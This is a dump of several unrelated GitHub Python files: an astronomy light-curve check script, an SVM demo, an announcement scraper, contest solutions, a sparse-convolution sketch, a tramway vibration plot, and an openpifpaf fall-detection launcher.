curve:')\n print(f'xrt_curve = {xrt_curve}')\n print('')\n\n print('Using Rates:')\n print(f'uvot_rate = {uvot_rate}')\n print(f'uvot_rate_err = {uvot_rate_err}')\n print(f'xrt_rate = {xrt_rate}')\n print(f'xrt_rate_err = {xrt_rate_err}')\n print('')\n\n uvot_filter = fits_path.split('/')[-1].split(',')[1]\n simbad_name = fits_path.split('/')[-1].split(',')[0]\n readable_name = source_names_readable[simbad_name]\n local_name = source_names_dict[simbad_name]\n\n print(f'uvot_filter = {uvot_filter}')\n print(f'simbad_name = {simbad_name}')\n print(f'readable_name = {readable_name}')\n print(f'local_name = {local_name}')\n\n # Setup Paths\n plot_path = Path(f'/mnt/d/anticorr_data/lightcurves/correlation_output/{simbad_name}/plots')\n table_path = Path(f'/mnt/d/anticorr_data/lightcurves/correlation_output/{simbad_name}/tables')\n #plot_path.mkdir(parents=True, exist_ok=True)\n #table_path.mkdir(parents=True, exist_ok=True)\n \n outfile = f'{simbad_name},{xrt_curve},{uvot_filter},{include_bad},{include_UL}'\n #out_table_prop = table_path/f'{outfile},table_prop.csv'\n #out_table_mc = table_path/f'{outfile},table_corr_mc.csv'\n #out_plot_corr_png = plot_path/f'{outfile},corr.png'\n #out_plot_corr_pdf = plot_path/f'{outfile},corr.pdf'\n \n \n ###############\n # Get subsets # \n ###############\n\n tab = Table.read(fits_path)\n print(tab)\n print(tab['OBSID','COI_SRC_RATE','COI_SRC_RATE_ERR', 'Rate','Ratepos','Rateneg'])\n \n tables = calc_subsets(tab)\n tab_5_sig = tables['tab_5_sig']\n tab_UL = tables['tab_UL']\n tab_no_UL = tables['tab_no_UL']\n tab_BAD = tables['tab_BAD']\n tab_no_BAD = tables['tab_no_BAD']\n tab_UL_no_bad = tables['tab_UL_no_bad']\n tab_no_UL_no_bad = tables['tab_no_UL_no_bad']\n \n print('Linear Correlation Test...')\n print('==========================')\n print('--------------------------')\n\n print('Input Parameters:')\n print('-----------------')\n print(f'include_bad : {include_bad}')\n print(f'include_UL : {include_UL}')\n print(f'fits_path : {fits_path}')\n\n print('---------')\n print('Settings:')\n print('---------')\n print(f'N_mc = {N_mc}')\n print(f'uvot_rate = {uvot_rate}')\n print(f'uvot_rate_err = {uvot_rate_err}')\n print(f'xrt_rate = {xrt_rate}')\n print(f'xrt_rate_err = {xrt_rate_err}')\n print(f'uvot_filter = {uvot_filter}')\n print(f'xrt_curve = {xrt_curve}')\n print(f'simbad_name = {simbad_name}')\n print(f'readable_name = {readable_name}')\n print(f'local_name = {local_name}')\n\n print('----------------')\n print('Data Properties:')\n print('----------------')\n all_table_properties = [df_properties(tab, \"tab\"),\n df_properties(tab_5_sig, \"tab_5_sig\"),\n df_properties(tab_UL, \"tab_UL\"),\n df_properties(tab_no_UL, \"tab_no_UL\"),\n df_properties(tab_BAD, \"tab_BAD\"),\n df_properties(tab_no_BAD, \"tab_no_BAD\"),\n df_properties(tab_UL_no_bad, \"tab_UL_no_bad\"),\n df_properties(tab_no_UL_no_bad, \"tab_no_UL_no_bad\")]\n df_tab_prop = pd.DataFrame(all_table_properties)\n #print(df_tab_prop)\n #print(f'Saving to: {out_table_prop}')\n #df_tab_prop.to_csv(out_table_prop, index=False)\n \n\n\n print('----------------------')\n print('Excluded Observations:')\n print('----------------------')\n excluded_obs = {}\n excluded_obs['tab_5_sig'] = get_exluded_obs(tab, tab_5_sig)\n #excluded_obs['tab_UL'] = get_exluded_obs(tab, tab_UL)\n #excluded_obs['tab_no_UL'] = get_exluded_obs(tab, tab_no_UL)\n #excluded_obs['tab_BAD'] = get_exluded_obs(tab, tab_BAD)\n #excluded_obs['tab_no_BAD'] = get_exluded_obs(tab, tab_no_BAD)\n #excluded_obs['tab_UL_no_bad'] = get_exluded_obs(tab, tab_UL_no_bad)\n #excluded_obs['tab_no_UL_no_bad'] = get_exluded_obs(tab, tab_no_UL_no_bad)\n\n lines_ds9 = []\n for k, v in excluded_obs.items():\n print(f'{k} : ')\n print(v)\n if len(v) > 0:\n for obsid in v:\n\n img_files = glob(f'download_scripts/{local_name}/{obsid}/*_sk.img.gz')\n reg_files = glob(f'download_scripts/{local_name}/*.reg')\n \n \n if len(img_files)==0:\n continue \n \n file_img = img_files[0] \n file_src_region = reg_files[0]\n file_bkg_region = reg_files[1]\n \n print('Found 5sig')\n crap = tab[tab['OBSID'] == v]['OBSID','COI_SRC_RATE','COI_SRC_RATE_ERR', 'Rate','Ratepos','Rateneg']\n print(crap)\n\n\n\n xrtr = crap[xrt_rate][0]\n uvotr = crap[uvot_rate][0]\n\n xrt_rate_mean = np.mean(tab[xrt_rate])\n uvot_rate_mean = np.mean(tab[uvot_rate])\n\n xrt_rate_std = np.std(tab[xrt_rate])\n uvot_rate_std = np.std(tab[uvot_rate])\n\n xrt_g_5sig = xrt_rate_mean+5*xrt_rate_std\n xrt_l_5sig = xrt_rate_mean-5*xrt_rate_std\n\n uvot_g_5sig = uvot_rate_mean+5*uvot_rate_std\n uvot_l_5sig = uvot_rate_mean-5*uvot_rate_std\n\n xrt_dev = (xrtr - xrt_rate_mean) / xrt_rate_std\n uvot_dev = (uvotr - uvot_rate_mean) / uvot_rate_std\n\n xrt_label = ''\n uvot_label = ''\n if xrtr > xrt_g_5sig:\n xrt_label ='[xrt hi]'\n if xrtr < xrt_l_5sig:\n xrt_label = '[xrt_lo]'\n if uvotr > uvot_g_5sig:\n uvot_label ='[uvot hi]'\n if uvotr < uvot_l_5sig:\n uvot_label = '[uvot lo]'\n\n\n\n \n lines =[f\"echo Source Name = {readable_name}\\n\",\n f\"echo UVOT filter = {uvot_filter}\\n\",\n f\"echo obsid = {obsid}\\n\",\n f\"echo uvot_rate={uvotr:.4f} [{uvot_dev:.4f} sig] mu={uvot_rate_mean:.4f} std={uvot_rate_std:.4f} +5std={uvot_g_5sig:.4f} -5std={uvot_l_5sig:.4f} {uvot_label}\\n\",\n f\"echo xrt_rate ={xrtr:.4f} [{xrt_dev:.4f} sig] mu={xrt_rate_mean:.4f} std={xrt_rate_std:.4f} +5std={xrt_g_5sig:.4f} -5std={xrt_l_5sig:.4f} {xrt_label}\\n\"]\n\n line_ds9 = f\"ds9 -tile {file_img} -region {file_src_region} -region {file_bkg_region} -scale log -zoom to fit -cmap b\\n\"\n print(line_ds9)\n\n with open('ds9_5sig.sh', 'a') as f:\n f.writelines(lines)\n f.write(line_ds9)\n\n print('='*50)\n return res\n\n\n\nif __name__ == \"__main__\":\n curve_nosys_files = glob(f'lightcurves/joined/*curve_nosys*.fits')\n hardrat_files = glob(f'lightcurves/joined/*hardrat*.fits')\n \n print(f'N_hardrat_files={len(hardrat_files)} N_curve_nosys_files={len(curve_nosys_files)}')\n print('Press any key to start, Ctrl+C to quit')\n for fits_path in curve_nosys_files:\n try:\n correlate(fits_path, include_bad=True, include_UL=True)\n except Exception as e:\n line = f\"#{fits_path} : Error: {e}\\n\"\n with open('ds9_5sig.sh', 'a') as f:\n f.write(f'{line}')\n\n\n print('#'*50)\n print('#'*50)\n\n for fits_path in hardrat_files:\n correlate(fits_path, include_bad=True, include_UL=False)\n correlate(fits_path, include_bad=False, include_UL=False)\n print('#'*50)\n print('#'*50)\n\n","repo_name":"nx1/anticorr_data","sub_path":"check_5sig.py","file_name":"check_5sig.py","file_ext":"py","file_size_in_byte":11027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72335527554","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 3 14:55:15 2018\r\n\r\n@author: acakmak\r\n\"\"\"\r\n#First, import the libraries\r\nimport numpy as np\r\nimport matplotlib as plt\r\nfrom pylab import *\r\nfrom sklearn import svm, datasets\r\n\r\n\r\n#Generate some fake clusters for N peoples' income/age \r\ndef createClusteredData(N, k):\r\n pointsPerCluster = float(N)/k\r\n X = []\r\n y = []\r\n for i in range (k):\r\n incomeCentroid = np.random.uniform(20000.0, 200000.0)\r\n ageCentroid = np.random.uniform(20.0, 70.0)\r\n for j in range(int(pointsPerCluster)):\r\n X.append([np.random.normal(incomeCentroid, 10000.0), np.random.normal(ageCentroid, 2.0)])\r\n y.append(i)\r\n X = np.array(X)\r\n y = np.array(y)\r\n return X, y\r\n\r\n\r\n\r\n# K-Means clustering culsters the data\r\n(X, y) = createClusteredData(100, 5)\r\n\r\nplt.figure(figsize=(8, 6))\r\nplt.scatter(X[:,0], X[:,1], c=y.astype(np.float))\r\nplt.show()\r\n\r\n\r\n\r\n\r\n# we use linear SVC to divide our chart into clusters:\r\nC = 1.0\r\nsvc = svm.SVC(kernel='linear', C=C).fit(X, y)\r\n\r\n\r\n# we can color the regions of each cluster:\r\ndef plotPredictions(clf):\r\n xx, yy = np.meshgrid(np.arange(0, 250000, 10),\r\n np.arange(10, 70, 0.5))\r\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\r\n\r\n plt.figure(figsize=(8, 6))\r\n Z = Z.reshape(xx.shape)\r\n plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)\r\n plt.scatter(X[:,0], X[:,1], c=y.astype(np.float))\r\n plt.show()\r\n \r\nplotPredictions(svc)\r\n\r\n\r\n#Then, we may print the predictions:\r\nprint(svc.predict([[200000, 70]]))\r\n\r\nprint(svc.predict([[50000, 95]]))","repo_name":"cakmakaf/SVMs_for_an_Income_vs_Age_Problem","sub_path":"Linear_SVM_imaginary_income.py","file_name":"Linear_SVM_imaginary_income.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"35495780856","text":"# import urllib.request\r\nfrom urllib.parse import urlparse\r\nimport re\r\nimport json\r\nimport time\r\nimport requests\r\nfrom lxml.html import etree\r\nfrom urllib.error import URLError, HTTPError, ContentTooShortError\r\n\r\n\r\nclass Throttle:\r\n \"\"\"Add a delay between donwloads to the same domain\"\"\"\r\n def ___init___(self, delay):\r\n self.delay = delay\r\n self.domains = {}\r\n\r\n def wait(self, url):\r\n domain = urlparse(url).netloc\r\n last_accessed = self.domains.get(domain)\r\n\r\n if self.delay > 0 and last_accessed is not None:\r\n sleep_secs = self.delay - (time.time() - last_accessed)\r\n if sleep_secs > 0:\r\n time.sleep(sleep_secs)\r\n self.domains[domain] = time.time()\r\n\r\n\r\ndef download(url, user_agent=None, num_retries=2, charset='utf-8', use_proxy=False):\r\n print(\"Downloading: \", url)\r\n\r\n if user_agent is None:\r\n user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\"\r\n \r\n if use_proxy:\r\n proxies = {\r\n \"http\": \"127.0.0.1:10809\",\r\n \"https\": \"127.0.0.1:10809\"\r\n }\r\n\r\n headers = {'user-agent': user_agent}\r\n try:\r\n if use_proxy:\r\n r = requests.get(url, headers=headers, proxies=proxies)\r\n else:\r\n r = requests.get(url, headers=headers)\r\n html = r.text\r\n except (requests.ConnectionError, requests.HTTPError, requests.Timeout, requests.TooManyRedirects) as e:\r\n print(\"Some exception occured: \", e.reason)\r\n html = None\r\n if num_retries > 0:\r\n if 500 <= r.status_code < 600:\r\n return download(url, num_retries-1)\r\n return html\r\n\r\n\r\ndef get_links(html):\r\n \"\"\"Return a list of links from html\"\"\"\r\n webpage_regex = re.compile(\"\"\"]+href=[\"'](.*?)[\"']\"\"\", re.IGNORECASE)\r\n return webpage_regex.findall(html)\r\n\r\n\r\ndef get_announcements_from_url(url):\r\n html = download(url)\r\n titles = []\r\n if html is not None:\r\n json_obj = json.loads(html)\r\n for ann in json_obj[\"announcements\"]:\r\n title = ann[\"announcementTitle\"]\r\n title = re.sub(r'?em>', \"\", title)\r\n titles.append(title)\r\n else:\r\n print(f\"Some exceptions happend in get_announcements_from_url, return empty list (URL: {url})\")\r\n return titles\r\n\r\n\r\ndef get_all_announcements():\r\n url_tmpl = \"http://www.cninfo.com.cn/new/fulltextSearch/full?searchkey=比亚迪&sdate=&edate=&isfulltext=false&sortName=pubdate&sortType=desc&pageNum=%d\"\r\n html = download(url_tmpl % 1)\r\n titles = []\r\n if html is not None:\r\n json_obj = json.loads(html)\r\n titles = titles + get_announcements_from_url(url_tmpl % 1)\r\n total_pages = json_obj[\"totalpages\"]\r\n if total_pages > 1:\r\n for i in range(2, total_pages+2):\r\n time.sleep(1)\r\n titles = titles + get_announcements_from_url(url_tmpl % i)\r\n\r\n return titles\r\n \r\n\r\nif __name__ == \"__main__\":\r\n titles = get_all_announcements()\r\n for title in titles:\r\n print(title)\r\n \r\n","repo_name":"davidlyu/investorMate","sub_path":"cninf.py","file_name":"cninf.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23447542671","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nProblem D. \r\nuses python 3.3\r\n\r\n@author: Eric Kuritzky\r\n\"\"\"\r\nfrom collections import *\r\nimport itertools as ito\r\nimport operator as op\r\nimport functools as ft\r\nfrom sys import argv, stdin, stdout, stderr, setrecursionlimit\r\n\r\n#setrecursionlimit(1000000)\r\n\r\nerrprt = ft.partial(print, file=stderr) \r\n \r\ndef readcase(f):\r\n nstr, nshard = readints(f)\r\n strs = [f.readline().strip() for _ in range(nstr)]\r\n return nshard, strs\r\n\r\ndef solvecase(case):\r\n nshard, strs = case\r\n worst = nties = 0\r\n for assign in ito.product(range(nshard), repeat=len(strs)):\r\n cost = getcost(strs, assign, nshard)\r\n if cost > worst:\r\n worst, nties = cost, 0\r\n elif cost == worst:\r\n nties += 1\r\n return '%d %d' % (worst, nties+1)\r\n\r\ndef getcost(strs, assign, nshard):\r\n astr = [[] for _ in range(nshard)]\r\n for i, s in enumerate(strs):\r\n astr[assign[i]].append(s)\r\n cost = 0\r\n for a in astr:\r\n cost += len(set(s[:i] for s in a for i in range(len(s)+1)))\r\n return cost\r\n \r\ndef readints(f):\r\n return list(map(int, f.readline().strip().split(' ')))\r\n\r\ndef readflds(f, types):\r\n if isinstance(types, tuple):\r\n return [typ(fld) for fld, typ\r\n in zip(f.readline().strip().split(),\r\n ito.chain(types, ito.repeat(types[-1])))]\r\n else:\r\n return [types(fld) for fld in f.readline().strip().split()]\r\n\r\ndef main():\r\n with open('D-small-attempt0.in') as f, open('out', 'w') as out:\r\n cases = int(f.readline())\r\n for ncase in range(1, cases+1):\r\n case = readcase(f)\r\n soln = solvecase(case)\r\n print('Case #%d: %s' % (ncase, soln))\r\n print('Case #%d: %s' % (ncase, soln), file=out)\r\n\r\nfrom datetime import datetime\r\n\r\nstart = datetime.now()\r\nprint(str(start))\r\nmain()\r\nstop = datetime.now()\r\nprint(str(stop-start))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_151/56.py","file_name":"56.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2723376355","text":"import os\nimport numpy as np\n\ndef get_output_sites(c, ks, stride, H_in, W_in, subm=False):\n out = []\n for i in range(c[0] - ks + 1, c[0] + 1):\n for j in range(c[1] - ks + 1, c[1] + 1):\n if i < 0 or i > H_in - ks or j < 0 or j > W_in - ks:\n continue\n out_i = i // stride\n out_j = j // stride\n out.append((out_i, out_j))\n return out\n\ndef get_offset(c, p, ks, stride):\n out_i, out_j = p\n src_i = out_i * stride\n src_j = out_j * stride\n offset_x = c[0] - (src_i + ks // 2)\n offset_y = c[1] - (src_j + ks // 2)\n return (offset_x, offset_y)\n\ndef spconv(input, in_coords, spatial_shape, kernel, stride=1, padding=0):\n \"\"\"\n Args:\n input: (N_in, C_in)\n in_coords: (N_in, 2)\n kernel: (k_h, k_w, C_in, C_out)\n Return:\n output: (N_out, C_out)\n \"\"\"\n N_in, C_in = input.shape\n H_in, W_in = spatial_shape\n k_h, k_w, C_in, C_out = kernel.shape\n ks = k_h\n\n hash_in = {}\n v_in = 0\n P_in = []\n for i in range(N_in):\n c = in_coords[i]\n hash_in[(c[0], c[1])] = v_in\n v_in += 1\n P_in.append((c[0], c[1]))\n \n hash_out = {}\n P_out = [[] for _ in range(N_in)]\n v_out = 0\n for i in range(N_in):\n c = in_coords[i]\n output_site = get_output_sites(c, ks, stride, H_in, W_in)\n for site in output_site:\n if site not in hash_out:\n hash_out[site] = v_out\n v_out += 1\n P_out[i] = output_site\n total_v_out = v_out\n \n # build rule book\n rulebook = []\n offset_counter = {}\n for i in range(N_in):\n c = in_coords[i]\n for p in P_out[i]:\n offset = get_offset(c, p, ks, stride)\n v_out = hash_out[p]\n if offset not in offset_counter:\n offset_counter[offset] = 0\n cnt = offset_counter[offset]\n rulebook.append([offset, cnt, i, v_out])\n offset_counter[offset] += 1\n\n output = np.zeros((total_v_out, C_out))\n for i in range(len(rulebook)):\n offset, count, v_in, v_out = rulebook[i]\n kc = (offset[0] + 1, offset[1] + 1)\n kw = kernel[kc[0], kc[1], :, :] # (C_in, C_out)\n in_feat = input[v_in] # (C_in)\n out_feat = np.dot(in_feat, kw) # (C_out)\n # print(v_in, v_out, in_feat, kw)\n output[v_out, :] += out_feat\n \n return output\n\nif __name__ == \"__main__\":\n input = np.random.rand(2, 3)\n spatial_shape = [5, 5]\n in_coords = np.array([[2, 1], [3, 2]])\n kernel = np.random.rand(3, 3, 3, 2)\n \n output = spconv(input, in_coords, spatial_shape, kernel)\n \n print(output)\n print(output.shape)\n\n\n","repo_name":"sunzhy3/exercise","sub_path":"code/spconv.py","file_name":"spconv.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23587904181","text":"from itertools import combinations\r\nfrom math import pi\r\nfrom heapq import *\r\n\r\ndef prikazi(indeks, niz):\r\n return \"Case #{}: {}\".format(indeks, niz)\r\n\r\n\r\ndef pomo(sez):\r\n if sez[-1][1] - sez[0][0] <= 12 * 60:\r\n return 2\r\n elif sez[0][1] + (24 * 60 - sez[-1][0]) <= 12 * 60:\r\n return 2\r\n else:\r\n return 4\r\n\r\n\r\ndef resitevStaro(opra, ac, aj):\r\n if ac + aj == 1:\r\n return 2\r\n if not ac + aj == 2:\r\n return \"NE VEM\"\r\n if ac == 0:\r\n return pomo(opra[1])\r\n elif aj == 0:\r\n return pomo(opra[0])\r\n else:\r\n return 2\r\n\r\ndef dobiOpis(elt):\r\n interval, kdo = elt\r\n od, do = interval\r\n return kdo, od, do\r\n\r\n\r\ndef najdiNasl(slo, i, maxsi):\r\n for j in range(i + 1, maxsi):\r\n if j in slo:\r\n return j\r\n return 0\r\n\r\n\r\ndef resitev(opra):\r\n kajPopravil = True\r\n N = len(opra)\r\n kolko = [0, 0]\r\n slo = {}\r\n idOpra = 0\r\n for par in opra:\r\n kdo, od, do = dobiOpis(par)\r\n kolko[kdo] += do - od\r\n slo[idOpra] = ((od, do), kdo)\r\n idOpra += 1\r\n\r\n pavze = [[], []]\r\n for i in slo:\r\n kdo, od, do = dobiOpis(opra[i])\r\n kdoPol, odPol, doPol = dobiOpis(opra[(i + 1) % N])\r\n if kdo == kdoPol:\r\n pavza = odPol - do if i < N - 1 else (24 * 60 - do) + odPol\r\n heappush(pavze[kdo], (pavza, i, najdiNasl(slo, i, N)))\r\n\r\n while kajPopravil:\r\n kajPopravil = False\r\n for oseba in range(2):\r\n if pavze[oseba]:\r\n if pavze[oseba][0][0] + kolko[oseba] <= 720:\r\n kolk, id1, id2 = heappop(pavze[oseba])\r\n kolko[oseba] += kolk\r\n _, od1, do1 = dobiOpis(slo[id1])\r\n _, od2, do2 = dobiOpis(slo[id2])\r\n if id2 != 0:\r\n # del slo[id1]\r\n # del slo[id2]\r\n slo[id1] = ((od1, od2), oseba)\r\n else:\r\n slo[id1] = ((od1, 24 * 60), oseba)\r\n slo[id2] = ((0, do2), oseba)\r\n kajPopravil = True\r\n if kajPopravil:\r\n break\r\n menjave = 0\r\n for i in range(N):\r\n kdo1, od1, do1 = dobiOpis(slo[i])\r\n kdo2, od2, do2 = dobiOpis(slo[(i + 1) % N])\r\n if kdo1 != kdo2:\r\n menjave += 1\r\n elif ((do1 - od2) % (24 * 60)) != 0:\r\n menjave += 2\r\n return menjave\r\n\r\n\r\ndef resi(ime):\r\n notr = ime + \".in\"\r\n ven = ime + \".out\"\r\n with open(notr) as f:\r\n with open(ven, \"w\") as g:\r\n for ind in range(int(f.readline())):\r\n AC, AJ = [int(x) for x in f.readline().strip().split()]\r\n opravila = []\r\n for i in range(AC + AJ):\r\n kdo = i < AC\r\n interval = tuple([int(x) for x in f.readline().strip().split()])\r\n opravila.append((interval, 1 - kdo))\r\n opravila.sort()\r\n print(prikazi(ind + 1, resitev(opravila)), file=g)\r\n\r\nresi(\"B-large\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_210/76.py","file_name":"76.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2511162253","text":"import matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nimport numpy as np\n\nTFS = \"TFS\"\nINCENTRO = \"Incentro\"\nURBOS3 = \"Urbos 3\"\nseries = [(320, TFS, 1), (328, TFS, 2), (334, TFS, 3), (346, TFS, 4), (373, INCENTRO, 1), (383, INCENTRO, 2),\n (395, URBOS3, 1)]\nPAVE = \"pave\"\nHERBE = \"herbe\"\n\nrcParams['axes.titlesize'] = 22\nrcParams['axes.labelsize'] = 16\nrcParams['legend.fontsize'] = 12\n\n\nclass Tramway:\n __slots__ = [\"__number\", \"__distance\", \"__speed\", \"__freq\", \"__ampl\", \"__sol\"]\n\n def __init__(self, number, distance, speed, freq, ampl, sol):\n \"\"\"\n Définit une expérience avec un tramway.\n\n :param number: Numéro du tramway\n :param distance: Distance à laquelle est prise la mesure de vibration (en m)\n :param speed: Vitesse du tramway (en m/s)\n :param freq: Fréquence vibratoire au passage du tramway (en Hz)\n :param ampl: Amplitude des vibrations au passage du tramway (en mm/s^2)\n :param sol : Numéro associé au type de revetement de la voie où la mesure à lieu\n \"\"\"\n self.__number = number\n self.__distance = distance\n self.__speed = speed\n self.__freq = freq\n self.__ampl = ampl\n self.__sol = sol\n\n def get_type(self):\n for serie in series:\n if self.__number <= serie[0]:\n return serie[1], serie[2]\n\n def distance(self):\n return self.__distance\n\n def speed(self):\n return self.__speed\n\n def freq(self):\n return self.__freq\n\n def ampl(self):\n return self.__ampl\n\n def get_sol(self):\n return self.__sol\n\n\ndef main():\n tramways = [Tramway(319, 1, 6.94, 37.09, 46.4, PAVE), Tramway(375, 1, 5.83, 22.03, 49.5, PAVE),\n Tramway(317, 1, 5.23, 37.70, 47.6, PAVE), Tramway(380, 1, 4.21, 26.46, 52.6, PAVE),\n Tramway(328, 1, 6.02, 35.93, 46.8, PAVE), Tramway(344, 1, 8.31, 31.12, 40.5, PAVE),\n Tramway(330, 3, 6.27, 47.52, 29.2, PAVE), Tramway(377, 3, 7.13, 19.43, 20.7, PAVE),\n Tramway(339, 3, 5.02, 33.58, 21.4, PAVE), Tramway(363, 3, 4.34, 31.66, 27.2, PAVE),\n Tramway(342, 3, 5.49, 38.13, 22.2, PAVE), Tramway(340, 3, 6.47, 33.68, 25.1, PAVE),\n Tramway(357, 5, 6.60, 20.71, 16.6, PAVE),\n Tramway(322, 5, 7.32, 31.26, 16.7, PAVE), Tramway(305, 5, 4.72, 33.48, 15.4, PAVE)]\n\n tfs_pave = [tram for tram in tramways if tram.get_type()[0] == TFS and tram.get_sol() == PAVE]\n incentro_pave = [tram for tram in tramways if tram.get_type()[0] == INCENTRO and tram.get_sol() == PAVE]\n urbos3_pave = [tram for tram in tramways if tram.get_type()[0] == URBOS3 and tram.get_sol() == PAVE]\n tfs_herbe = [tram for tram in tramways if tram.get_type()[0] == TFS and tram.get_sol() == HERBE]\n incentro_herbe = [tram for tram in tramways if tram.get_type()[0] == INCENTRO and tram.get_sol() == HERBE]\n urbos3_herbe = [tram for tram in tramways if tram.get_type()[0] == URBOS3 and tram.get_sol() == HERBE]\n\n fig, ax = plt.subplots(figsize=(15, 8))\n ax.set_title('Amplitude vibratoire')\n ax.set_xlabel(r'Distance ($m$)')\n ax.set_ylabel(r'Amplitude ($mm.s^{-2}$)')\n ax.grid(which='major')\n ax.grid(which='minor', linestyle='--', linewidth=0.5)\n ax.minorticks_on()\n ax.scatter([tram.distance() for tram in tfs_pave], [tram.ampl() for tram in tfs_pave], label=TFS,\n s=121, c=\"steelblue\", marker=\"p\")\n ax.scatter([tram.distance() for tram in incentro_pave], [tram.ampl() for tram in incentro_pave],\n label=INCENTRO, s=121, c='steelblue', marker=\"X\")\n ax.scatter([tram.distance() for tram in tfs_herbe], [tram.ampl() for tram in tfs_herbe], label=TFS,\n s=121, c=\"seagreen\", marker=\"p\")\n ax.scatter([tram.distance() for tram in incentro_herbe], [tram.ampl() for tram in incentro_herbe],\n label=INCENTRO, s=121, c='seagreen', marker=\"X\")\n ax.set_ylim(0, 1.1 * max([tram.ampl() for tram in tramways]))\n\n ax.legend(loc='upper right')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"torpill40/clemenceau","sub_path":"tipe/graphe_p6_modif_en_cours.py","file_name":"graphe_p6_modif_en_cours.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28803765637","text":"from models.book import Book\n\nbook1 = Book(\"Diary\", \"Chuck Palahniuk\", \"fiction\", \"0\", True)\nbook2 = Book(\"Solaris\", \"Stanislaw Lem\", \"science-fiction\", \"1\", False)\nbook3 = Book(\"Jubiabá\", \"Jorje Amado\", \"fiction\", \"2\", True)\nbook4 = Book(\"Ursula K Le Guin\", \"The Dispossessed\", \"science-fiction\", \"3\", False)\n\n\nbooks = [book1, book2, book3, book4]\n\ndef add_new_book(book):\n books.append(book)\n\ndef remove_book(book):\n books.remove(book)\n\n\n# List all Books\n# * Show an individual Book\n# * Add a new Book to the Library.\n# * Remove a Book from the Library","repo_name":"RekaKovacs93/week_03-day_05-HW","sub_path":"models/books_list.py","file_name":"books_list.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20258466906","text":"#\n# Author: eloyhz\n# Date: Sep/14/2020\n#\n# UVa 00412 - Pi\n# https://onlinejudge.org/external/4/412.pdf\n#\n\nfrom math import sqrt\n\ndef gcd(a, b):\n return gcd(b, a % b) if b else a\n\n\ndef solve(a):\n n = len(a)\n b = []\n for i in range(n - 1):\n for j in range(i + 1, n):\n b.append((a[i], a[j]))\n count = 0\n for x in b:\n if gcd(x[0], x[1]) == 1:\n count += 1\n return sqrt(6 * len(b) / count) if count else 0\n\n\nif __name__ == '__main__':\n while True:\n n = int(input())\n if n == 0:\n break\n a = [0] * n\n for i in range(n):\n a[i] = int(input())\n ans = solve(a)\n if ans == 0:\n print('No estimate for this data set.')\n else:\n print(f'{ans:.6f}')\n\n","repo_name":"eloyhz/competitive-programming","sub_path":"UVa/uva000412_pi.py","file_name":"uva000412_pi.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"71313501313","text":"import os\nimport subprocess\nimport xml.etree.ElementTree as ET\n\nimport cv2\n\n\n\ndef update_xml_file(video_folder, video_filename):\n # XML 파일 수정\n targetXML = '/home/root1/anaconda3/envs/falldetection_ai/lib/python3.7/site-packages/openpifpaf/config/config.xml'\n tree = ET.parse(targetXML)\n root = tree.getroot()\n\n for rstpurl in root.iter('RTSPURL'):\n rstpurl.text = os.path.join(video_folder, video_filename)\n\n tree.write(targetXML, encoding='UTF-8')\n\ndef run_openpifpaf(video_folder, video_filename):\n # Openpifpaf 실행\n subprocess.run('cd /home/root1/anaconda3/envs/falldetection_ai/lib/python3.7/site-packages/openpifpaf/', shell=True)\n subprocess.run('python3 -m openpifpaf.video --show --video-fps=30', shell=True)\n\n# 동영상 파일 경로\nvideo_folder = '/home/root1/Desktop/videos/'\n\n# 최근에 생성된 동영상 파일 가져오기\nvideos_name = '/home/root1/Desktop/videos_Preprocessor/videos.mp4'\n\n\n# XML 파일 수정\nupdate_xml_file(video_folder, videos_name)\n#update_xml_file(video_folder, f'video{file_count + 1}.mp4')\n\n# Openpifpaf 실행\nrun_openpifpaf(video_folder, videos_name)\n#run_openpifpaf(video_folder, f'video{file_count + 1}.mp4')\n","repo_name":"P1nos/Sigma-FallDetection","sub_path":"엣지 컴퓨터/openpifpaf_processing.py","file_name":"openpifpaf_processing.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
